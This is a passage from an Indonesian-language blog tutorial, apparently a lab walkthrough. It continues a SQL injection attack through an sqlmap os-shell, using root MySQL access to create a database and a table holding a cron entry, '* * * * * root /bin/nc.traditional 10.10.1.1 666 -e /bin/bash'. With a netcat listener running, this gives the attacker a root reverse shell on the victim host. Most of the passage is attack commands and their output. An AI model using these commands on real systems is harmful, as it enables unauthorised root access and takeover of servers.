background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;---&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;Database&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;information_schema&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;members&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;mysql&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;b&gt;---&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-UbMiRqKJjQ0/T6yN4cvgq7I/AAAAAAAABbQ/hSqoPQHvL_0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="134" src="http://2.bp.blogspot.com/-UbMiRqKJjQ0/T6yN4cvgq7I/AAAAAAAABbQ/hSqoPQHvL_0/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Parameter -e akan mengeksekusi perintah SQL. Gunakan tanda petik dua untuk mengapit command MySQL, dan akhiri command mysql dengan titik koma. Setelah ini, kita buat database baru dengan nama exploit.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "create database exploit;"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;No output&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "show databases;"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;command standard output:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;Database&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;information_schema&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;exploit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;members&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;mysql&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Database exploit, telah berhasil dibuat. Selanjutnya kita buat tabel bernama rootme, dan kolom bernama stack dengan atribut text.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Note : Jika command mysql berhasil di eksekusi, maka tidak ada output yang tercipta (No Output).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "use exploit; create table rootme (stack text);"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;No output&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "use exploit; show tables;"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;command standard output:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;Tables_in_exploit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;rootme&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-lZJsEz1Gozg/T6yOlCPFz_I/AAAAAAAABbY/SiNFiNqefdc/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="134" src="http://3.bp.blogspot.com/-lZJsEz1Gozg/T6yOlCPFz_I/AAAAAAAABbY/SiNFiNqefdc/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Selanjutnya kita input table ini dengan perintah cron.d. Ketahuilah rooting sebelumnya dengan burpsuite, dimana attacker menaruh perintah cron.d agar root mengeksekusi file tersebut, sehingga attacker mendapatkan shell dengan privilege root. Artikel dapat ditemukan di&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/sql-injection-level-4-final.html" target="_blank"&gt;SQL Injection Level 4 Final [rooting]&lt;/a&gt;. Tabel ini kita masukan perintah cron.d seperti ini&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dimana 10.10.1.1 adalah IP saya (sesuaikan dengan IP address anda), dan 666 adalah port listener netcat saya. Kita input perintah ini ke dalam table rootme.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "use exploit; insert into rootme value ('* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash \r\n');"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;No output&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;span style="color: lime;"&gt;os-shell&amp;gt; &lt;/span&gt;&lt;span style="color: red;"&gt;mysql -uroot -e "use exploit; select * from rootme;"&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;do you want to retrieve the command standard output? [Y/n/a]&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;command standard output:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;stack&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;---&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/b&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-kB7YP6iXO-A/T6yQcGSkJzI/AAAAAAAABbg/_aknmfH9_T4/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="134" src="http://1.bp.blogspot.com/-kB7YP6iXO-A/T6yQcGSkJzI/AAAAAAAABbg/_aknmfH9_T4/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita jalankan netcat listener pada port 666 dari attacker.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;nc -l -v -p 666&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-vLsgiuMu75Q/T6yRGCHMvkI/AAAAAAAABbo/ShnUp5InjfY/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="134" src="http://2.bp.blogspot.com/-vLsgiuMu75Q/T6yRGCHMvkI/AAAAAAAABbo/ShnUp5InjfY/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah menunggu 2 menit, file cron.d tereksekusi, dan kita akan mendapatkan koneksi netcat dari korban dengan privilege root.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; font-family: monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, 